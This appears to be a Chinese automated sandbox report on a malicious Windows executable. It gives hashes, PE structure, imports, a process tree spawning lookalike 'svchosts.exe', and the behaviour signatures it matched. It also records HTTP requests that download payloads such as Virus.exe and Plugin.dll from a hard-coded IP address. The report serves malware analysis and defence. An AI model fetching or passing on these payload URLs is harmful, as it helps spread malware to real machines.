分析任务

分析类型 虚拟机标签 开始时间 结束时间 持续时间
文件 (Windows) win7-sp1-x64-shaapp03-1 2020-11-30 12:51:18 2020-11-30 12:53:28 130 秒

魔盾分数

10.0

危险的

文件详细信息

文件名 13131313.exe
文件大小 790528 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
MD5 1d25ea59f34de2654bdd0944ed923037
SHA1 49786a35bdcab73336dd0b06fd944a27957f9cba
SHA256 90ec36bfc87ae17dacd147138ead049256037df7ba62e6328db16538ffc684c8
SHA512 e6a4e2f5f722c1bebc5c00f1401988d6a3478e9ea5eff107744151c1475bb4f45102529a6b3aeb35e52b41dc91bd3ab1b2508ceb4513631131bf17f87bfd0440
CRC32 6BB767EB
Ssdeep 12288:uFyAi2fm2Nsed36Ugm7YUtvm/nmeAz7cE5ulX:uTu2Welxg4YSvCmeE7cEuh
Yara 登录查看Yara规则
样本下载 提交误报

登录查看威胁特征

运行截图


访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net
A 23.63.75.34
A 23.63.75.9

摘要

登录查看详细行为信息

PE 信息

初始地址 0x00400000
入口地址 0x0046564e
声明校验值 0x00000000
实际校验值 0x000ca899
最低操作系统版本要求 4.0
编译时间 2020-11-30 12:51:01
载入哈希 6ce94e265482c54fdfe9a5a3dcee76c8
图标
图标精确哈希值 7e8d0dbe5de19f74f384ae459c5abecf
图标相似性哈希值 439e81c5165936c3ea55d4df339c6380

版本信息

LegalCopyright
FileVersion
Comments
ProductName
ProductVersion
FileDescription
Translation

PE 数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x00084762 0x00085000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.58
.rdata 0x00086000 0x00020ef4 0x00021000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.65
.data 0x000a7000 0x000360a8 0x00014000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 4.98
.rsrc 0x000de000 0x00005958 0x00006000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.82

资源

名称 偏移量 大小 语言 子语言 熵(Entropy) 文件类型
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
TEXTINCLUDE 0x000dec20 0x00000151 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 5.25 C source, ASCII text, with CRLF line terminators
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_CURSOR 0x000df110 0x000000b4 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.74 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_BITMAP 0x000e0818 0x00000144 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.88 data
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_ICON 0x000e117c 0x00000668 LANG_NEUTRAL SUBLANG_NEUTRAL 2.62 dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0
RT_MENU 0x000e17f0 0x00000284 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 4.28 data
RT_MENU 0x000e17f0 0x00000284 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 4.28 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_DIALOG 0x000e2a38 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.74 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_STRING 0x000e3480 0x00000024 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 0.90 data
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_CURSOR 0x000e34cc 0x00000022 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.25 MS Windows cursor resource - 2 icons, 32x256, hotspot @1x1
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_GROUP_ICON 0x000e3534 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 2.02 MS Windows icon resource - 1 icon, 16x16, 16 colors
RT_VERSION 0x000e3548 0x00000240 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED 3.83 data
RT_MANIFEST 0x000e3788 0x000001cd LANG_NEUTRAL SUBLANG_NEUTRAL 5.08 XML 1.0 document, ASCII text, with very long lines, with no line terminators

导入

库: RASAPI32.dll:
0x486398 RasHangUpA
库: KERNEL32.dll:
0x486174 lstrcmpiA
0x486178 SetEndOfFile
0x48617c UnlockFile
0x486180 LockFile
0x486184 FlushFileBuffers
0x486188 SetFilePointer
0x48618c DuplicateHandle
0x486190 lstrcpynA
0x486198 SetLastError
0x4861a4 GetCurrentProcess
0x4861ac GetSystemDirectoryA
0x4861b0 CreateSemaphoreA
0x4861b4 ResumeThread
0x4861b8 ReleaseSemaphore
0x4861c4 GetProfileStringA
0x4861c8 WriteFile
0x4861d0 IsBadCodePtr
0x4861d4 IsBadReadPtr
0x4861d8 CompareStringW
0x4861dc CompareStringA
0x4861e4 GetStringTypeW
0x4861e8 GetStringTypeA
0x4861f0 IsBadWritePtr
0x4861f4 VirtualAlloc
0x4861f8 LCMapStringW
0x4861fc LCMapStringA
0x486204 VirtualFree
0x486208 HeapCreate
0x48620c HeapDestroy
0x486214 GetStdHandle
0x486218 SetHandleCount
0x486230 GetFileType
0x486234 SetStdHandle
0x486238 GetACP
0x48623c HeapSize
0x486240 TerminateProcess
0x486244 GetLocalTime
0x486248 GetSystemTime
0x48624c RaiseException
0x486250 CreateFileA
0x486254 SetEvent
0x486258 FindResourceA
0x48625c LoadResource
0x486260 LockResource
0x486264 ReadFile
0x486268 GetModuleFileNameA
0x48626c WideCharToMultiByte
0x486270 MultiByteToWideChar
0x486274 GetCurrentThreadId
0x486278 ExitProcess
0x48627c GlobalSize
0x486280 GlobalFree
0x48628c lstrcatA
0x486290 lstrlenA
0x486294 WinExec
0x486298 lstrcpyA
0x48629c FindNextFileA
0x4862a0 GlobalReAlloc
0x4862a4 HeapFree
0x4862a8 HeapReAlloc
0x4862ac GetProcessHeap
0x4862b0 HeapAlloc
0x4862b4 GetFullPathNameA
0x4862b8 FreeLibrary
0x4862bc LoadLibraryA
0x4862c0 GetLastError
0x4862c4 GetVersionExA
0x4862cc CreateThread
0x4862d0 CreateEventA
0x4862d4 Sleep
0x4862d8 GlobalAlloc
0x4862dc GlobalLock
0x4862e0 GlobalUnlock
0x4862e4 GetTempPathA
0x4862e8 FindFirstFileA
0x4862ec FindClose
0x4862f0 GetFileAttributesA
0x4862f4 DeleteFileA
0x486300 GetModuleHandleA
0x486304 GetProcAddress
0x486308 RtlUnwind
0x48630c GetStartupInfoA
0x486310 GetOEMCP
0x486314 GetCPInfo
0x486318 GetProcessVersion
0x48631c SetErrorMode
0x486320 GlobalFlags
0x486324 GetCurrentThread
0x486328 GetFileTime
0x48632c GetFileSize
0x486330 TlsGetValue
0x486334 LocalReAlloc
0x486338 TlsSetValue
0x48633c TlsFree
0x486340 GlobalHandle
0x486344 TlsAlloc
0x486348 LocalAlloc
0x48634c lstrcmpA
0x486350 GetVersion
0x486354 MulDiv
0x486358 GetCommandLineA
0x48635c GetTickCount
0x486360 CreateProcessA
0x486364 WaitForSingleObject
0x486368 CloseHandle
0x48636c LocalFree
0x486374 GlobalGetAtomNameA
0x486378 GlobalAddAtomA
0x48637c GlobalFindAtomA
0x486380 GlobalDeleteAtom
库: USER32.dll:
0x4863b4 GetCursorPos
0x4863b8 MessageBoxA
0x4863bc SetWindowPos
0x4863c0 SendMessageA
0x4863c4 DestroyCursor
0x4863c8 SetParent
0x4863cc IsWindow
0x4863d0 PostMessageA
0x4863d4 GetTopWindow
0x4863d8 GetParent
0x4863dc GetSystemMetrics
0x4863e0 GetFocus
0x4863e4 GetClientRect
0x4863e8 InvalidateRect
0x4863ec ValidateRect
0x4863f0 UpdateWindow
0x4863f4 EqualRect
0x4863f8 GetWindowRect
0x4863fc SetForegroundWindow
0x486400 DestroyMenu
0x486404 IsChild
0x486408 ReleaseDC
0x48640c IsRectEmpty
0x486410 FillRect
0x486414 GetDC
0x486418 SetCursor
0x48641c LoadCursorA
0x486420 SetActiveWindow
0x486424 GetSysColor
0x486428 SetWindowLongA
0x48642c GetWindowLongA
0x486430 RedrawWindow
0x486434 EnableWindow
0x486438 IsWindowVisible
0x48643c OffsetRect
0x486440 PtInRect
0x486444 DestroyIcon
0x486448 IntersectRect
0x48644c InflateRect
0x486450 SetRect
0x486454 SetScrollPos
0x486458 SetScrollRange
0x48645c GetScrollRange
0x486460 SetCapture
0x486464 GetCapture
0x486468 ReleaseCapture
0x48646c SetTimer
0x486470 KillTimer
0x486474 WinHelpA
0x486478 LoadBitmapA
0x48647c CopyRect
0x486484 ScreenToClient
0x486488 GetMessagePos
0x48648c SetWindowRgn
0x486494 GetWindow
0x486498 GetActiveWindow
0x48649c SetFocus
0x4864a0 IsIconic
0x4864a4 EmptyClipboard
0x4864a8 SetClipboardData
0x4864ac OpenClipboard
0x4864b0 GetClipboardData
0x4864b4 CloseClipboard
0x4864b8 wsprintfA
0x4864bc WaitForInputIdle
0x4864c0 SetCursorPos
0x4864c4 BeginPaint
0x4864c8 GetSysColorBrush
0x4864cc LoadStringA
0x4864d0 GetDesktopWindow
0x4864d4 GetClassNameA
0x4864dc GetMenuState
0x4864e0 SetMenuItemBitmaps
0x4864e4 CheckMenuItem
0x4864e8 MoveWindow
0x4864ec IsDialogMessageA
0x4864f0 ScrollWindowEx
0x4864f4 SendDlgItemMessageA
0x4864f8 MapWindowPoints
0x4864fc AdjustWindowRectEx
0x486500 SetWindowTextA
0x486504 GetForegroundWindow
0x486508 LoadIconA
0x48650c TranslateMessage
0x486510 DrawFrameControl
0x486514 DrawEdge
0x486518 DrawFocusRect
0x48651c WindowFromPoint
0x486520 GetMessageA
0x486524 DispatchMessageA
0x486528 SetRectEmpty
0x486538 DrawIconEx
0x48653c CreatePopupMenu
0x486540 AppendMenuA
0x486544 ModifyMenuA
0x486548 CreateMenu
0x486550 GetDlgCtrlID
0x486554 GetSubMenu
0x486558 EnableMenuItem
0x48655c ClientToScreen
0x486564 LoadImageA
0x48656c ShowWindow
0x486570 IsWindowEnabled
0x486578 GetKeyState
0x486580 PostQuitMessage
0x486584 IsZoomed
0x486588 GetClassInfoA
0x48658c DefWindowProcA
0x486590 GetSystemMenu
0x486594 DeleteMenu
0x486598 GetMenu
0x48659c SetMenu
0x4865a0 PeekMessageA
0x4865a4 GetWindowTextA
0x4865ac CharUpperA
0x4865b0 GetWindowDC
0x4865b4 UnregisterClassA
0x4865b8 EndPaint
0x4865bc TabbedTextOutA
0x4865c0 DrawTextA
0x4865c4 GrayStringA
0x4865c8 GetDlgItem
0x4865cc DestroyWindow
0x4865d4 EndDialog
0x4865d8 GetNextDlgTabItem
0x4865dc GetWindowPlacement
0x4865e4 GetLastActivePopup
0x4865e8 GetMessageTime
0x4865ec RemovePropA
0x4865f0 CallWindowProcA
0x4865f4 GetPropA
0x4865f8 UnhookWindowsHookEx
0x4865fc SetPropA
0x486600 GetClassLongA
0x486604 CallNextHookEx
0x486608 SetWindowsHookExA
0x48660c CreateWindowExA
0x486610 GetMenuItemID
0x486614 GetMenuItemCount
0x486618 RegisterClassA
0x48661c GetScrollPos
库: GDI32.dll:
0x48602c CreatePalette
0x486030 StretchBlt
0x486034 SelectPalette
0x486038 RealizePalette
0x48603c GetDIBits
0x486040 GetWindowExtEx
0x486044 GetViewportOrgEx
0x486048 GetWindowOrgEx
0x48604c BeginPath
0x486050 EndPath
0x486054 PathToRegion
0x486058 CreateEllipticRgn
0x48605c CreateRoundRectRgn
0x486060 GetTextColor
0x486064 GetBkMode
0x486068 GetBkColor
0x48606c GetROP2
0x486070 GetStretchBltMode
0x486074 GetPolyFillMode
0x48607c CreateDCA
0x486080 CreateBitmap
0x486084 SelectObject
0x486088 GetObjectA
0x48608c CreatePen
0x486090 PatBlt
0x486094 CombineRgn
0x486098 CreateRectRgn
0x48609c FillRgn
0x4860a0 CreateSolidBrush
0x4860a4 GetStockObject
0x4860a8 CreateFontIndirectA
0x4860ac EndPage
0x4860b0 EndDoc
0x4860b4 DeleteDC
0x4860b8 CreateDIBitmap
0x4860bc StartPage
0x4860c0 BitBlt
0x4860c4 CreateCompatibleDC
0x4860c8 DeleteObject
0x4860cc Rectangle
0x4860d0 LPtoDP
0x4860d4 DPtoLP
0x4860d8 GetCurrentObject
0x4860dc RoundRect
0x4860e4 GetDeviceCaps
0x4860e8 SaveDC
0x4860ec RestoreDC
0x4860f0 SetBkMode
0x4860f4 SetPolyFillMode
0x4860f8 SetROP2
0x4860fc SetTextColor
0x486100 SetMapMode
0x486104 SetViewportOrgEx
0x486108 OffsetViewportOrgEx
0x48610c SetViewportExtEx
0x486110 ScaleViewportExtEx
0x486114 SetWindowOrgEx
0x486118 SetWindowExtEx
0x48611c ScaleWindowExtEx
0x486120 GetClipBox
0x486124 ExcludeClipRect
0x486128 MoveToEx
0x48612c LineTo
0x486130 SelectClipRgn
0x486134 CreatePolygonRgn
0x486138 GetClipRgn
0x48613c SetStretchBltMode
0x486144 SetBkColor
0x486148 ExtSelectClipRgn
0x48614c Ellipse
0x486150 StartDocA
0x486154 GetTextMetricsA
0x486158 Escape
0x48615c ExtTextOutA
0x486160 TextOutA
0x486164 RectVisible
0x486168 PtVisible
0x48616c GetViewportExtEx
库: WINMM.dll:
0x486658 waveOutWrite
0x48665c waveOutPause
0x486660 waveOutReset
0x486664 waveOutClose
0x486668 waveOutGetNumDevs
0x48666c waveOutOpen
0x486674 midiStreamOpen
0x486678 midiStreamProperty
0x486680 midiStreamOut
0x486684 midiStreamStop
0x486688 midiOutReset
0x48668c midiStreamClose
0x486690 midiStreamRestart
库: WINSPOOL.DRV:
0x486698 ClosePrinter
0x48669c OpenPrinterA
0x4866a0 DocumentPropertiesA
库: ADVAPI32.dll:
0x486000 RegCreateKeyExA
0x486004 RegQueryValueA
0x486008 RegCreateKeyA
0x48600c RegSetValueExA
0x486010 RegOpenKeyExA
0x486014 RegCloseKey
库: SHELL32.dll:
0x4863a4 ShellExecuteA
0x4863ac Shell_NotifyIconA
库: ole32.dll:
0x4866f0 CLSIDFromString
0x4866f4 OleUninitialize
0x4866f8 OleInitialize
库: OLEAUT32.dll:
0x486388 UnRegisterTypeLib
0x48638c RegisterTypeLib
0x486390 LoadTypeLib
库: COMCTL32.dll:
0x48601c None
0x486020 ImageList_Destroy
库: WS2_32.dll:
0x4866a8 closesocket
0x4866ac send
0x4866b0 select
0x4866b4 WSACleanup
0x4866b8 WSAStartup
0x4866bc WSAAsyncSelect
0x4866c0 inet_ntoa
0x4866c4 recvfrom
0x4866c8 ioctlsocket
0x4866cc recv
0x4866d0 getpeername
0x4866d4 accept
库: WININET.dll:
0x486624 HttpQueryInfoA
0x486628 InternetOpenA
0x48662c InternetCloseHandle
0x486630 InternetSetOptionA
0x486634 InternetConnectA
0x486638 InternetReadFile
0x486640 HttpSendRequestA
0x486644 HttpOpenRequestA
0x486648 InternetCrackUrlA
库: comdlg32.dll:
0x4866dc ChooseColorA
0x4866e0 GetSaveFileNameA
0x4866e4 GetOpenFileNameA
0x4866e8 GetFileTitleA

.text
`.rdata
@.data
.rsrc
8`}<j
D$<HWI
T$th
D$4<WI
D$$TWI
D$@Sj
L$8h
D$8Rj
l$<VWj
D$L8WI
D$08WI
D$88WI
D$8d\I
D$(d\I
D$(p\I
D$(d\I
D$(p\I
D$(p\I
D$8p\I
D$x `I
}'h
9^xu5j
T$,Qj
T$0Pj
D$8RPj
D$0h
T$,Qj
NpRQj
t$<Vj
D$((cI
D$ @cI
T$<h
D$(hF
没有防病毒引擎扫描信息!

进程树


13131313.exe, PID: 2312, 上一级进程 PID: 2152
svchosts.exe, PID: 2492, 上一级进程 PID: 2312
svchosy.exe, PID: 2660, 上一级进程 PID: 2492
services.exe, PID: 432, 上一级进程 PID: 344
mscorsvw.exe, PID: 2208, 上一级进程 PID: 432
mscorsvw.exe, PID: 2020, 上一级进程 PID: 432

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49163 23.63.75.9 acroipm.adobe.com 80
192.168.122.201 49161 45.125.56.74 8081
192.168.122.201 49164 45.125.56.74 8081
192.168.122.201 49166 45.125.56.74 888

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 59401 192.168.122.1 53

域名解析 (可点击查询WPING实时安全评级)

域名 安全评级 响应
acroipm.adobe.com CNAME acroipm.adobe.com.edgesuite.net
CNAME a1983.dscd.akamai.net
A 23.63.75.34
A 23.63.75.9

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49163 23.63.75.9 acroipm.adobe.com 80
192.168.122.201 49161 45.125.56.74 8081
192.168.122.201 49164 45.125.56.74 8081
192.168.122.201 49166 45.125.56.74 888

UDP

源地址 源端口 目标地址 目标端口
192.168.122.201 59401 192.168.122.1 53

HTTP 请求

URI HTTP数据
URL专业沙箱检测 -> http://45.125.56.74:8081/Memory.sys
GET /Memory.sys HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache

URL专业沙箱检测 -> http://45.125.56.74:8081/Memory2.sys
GET /Memory2.sys HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache
Cookie: HFS_SID_=0.890553839271888

URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip
GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

URL专业沙箱检测 -> http://45.125.56.74:8081/Plugin.dll
GET /Plugin.dll HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache

URL专业沙箱检测 -> http://45.125.56.74:8081/Virus.exe
GET /Virus.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 45.125.56.74:8081
Cache-Control: no-cache
Cookie: HFS_SID_=0.708140051923692

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

Timestamp Source IP Source Port Destination IP Destination Port Protocol SID Signature Category
2020-11-30 12:51:39.739854+0800 192.168.122.201 49161 45.125.56.74 8081 TCP 2016879 ET POLICY Unsupported/Fake Windows NT Version 5.0 Potential Corporate Privacy Violation
2020-11-30 12:51:40.706203+0800 192.168.122.201 49161 45.125.56.74 8081 TCP 2016879 ET POLICY Unsupported/Fake Windows NT Version 5.0 Potential Corporate Privacy Violation
2020-11-30 12:51:44.682320+0800 192.168.122.201 49164 45.125.56.74 8081 TCP 2016879 ET POLICY Unsupported/Fake Windows NT Version 5.0 Potential Corporate Privacy Violation

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件
抱歉! 没有任何文件投放。
没有发现相似的分析.
HTML 总结报告
(需15-60分钟同步)
下载

Processing ( 17.048 seconds )

  • 12.054 Suricata
  • 1.202 BehaviorAnalysis
  • 1.182 NetworkAnalysis
  • 1.013 VirusTotal
  • 0.909 Static
  • 0.356 TargetInfo
  • 0.304 peid
  • 0.012 Strings
  • 0.01 AnalysisInfo
  • 0.004 Memory
  • 0.002 config_decoder

Signatures ( 2.134 seconds )

  • 1.566 md_url_bl
  • 0.076 api_spamming
  • 0.055 stealth_decoy_document
  • 0.055 stealth_timeout
  • 0.043 antiav_detectreg
  • 0.018 injection_createremotethread
  • 0.018 process_interest
  • 0.017 infostealer_ftp
  • 0.014 vawtrak_behavior
  • 0.014 kovter_behavior
  • 0.013 antiemu_wine_func
  • 0.012 infostealer_browser_password
  • 0.012 injection_runpe
  • 0.011 antivm_vbox_libs
  • 0.01 infostealer_im
  • 0.01 md_domain_bl
  • 0.009 mimics_filetime
  • 0.009 shifu_behavior
  • 0.008 reads_self
  • 0.008 virus
  • 0.008 process_needed
  • 0.008 antianalysis_detectreg
  • 0.007 stealth_file
  • 0.007 anomaly_persistence_autorun
  • 0.007 exec_crash
  • 0.007 antivm_generic_disk
  • 0.006 bootkit
  • 0.006 hancitor_behavior
  • 0.006 antiav_detectfile
  • 0.005 geodo_banking_trojan
  • 0.005 infostealer_bitcoin
  • 0.005 infostealer_mail
  • 0.005 network_http
  • 0.005 ransomware_files
  • 0.004 antiav_avast_libs
  • 0.004 betabot_behavior
  • 0.004 antisandbox_sunbelt_libs
  • 0.004 ransomware_extensions
  • 0.003 antivm_vmware_libs
  • 0.003 antisandbox_sboxie_libs
  • 0.003 antiav_bitdefender_libs
  • 0.003 antivm_generic_scsi
  • 0.002 tinba_behavior
  • 0.002 andromeda_behavior
  • 0.002 antivm_generic_services
  • 0.002 antisandbox_sleep
  • 0.002 kibex_behavior
  • 0.002 anormaly_invoke_kills
  • 0.002 antivm_parallels_keys
  • 0.002 antivm_vbox_files
  • 0.002 antivm_xen_keys
  • 0.002 disables_browser_warn
  • 0.002 darkcomet_regkeys
  • 0.002 network_torgateway
  • 0.001 rat_nanocore
  • 0.001 dridex_behavior
  • 0.001 Locky_behavior
  • 0.001 antivm_vmware_events
  • 0.001 cerber_behavior
  • 0.001 cryptowall_behavior
  • 0.001 antisandbox_productid
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_hyperv_keys
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_security
  • 0.001 modify_proxy
  • 0.001 maldun_malicious_drop_executable_file_to_temp_folder
  • 0.001 md_bad_drop
  • 0.001 network_cnc_http
  • 0.001 recon_fingerprint

Reporting ( 0.627 seconds )

  • 0.57 ReportHTMLSummary
  • 0.057 Malheur
Task ID 592619
Mongo ID 5fc47ae07e769a09e2a4d387
Cuckoo release 1.4-Maldun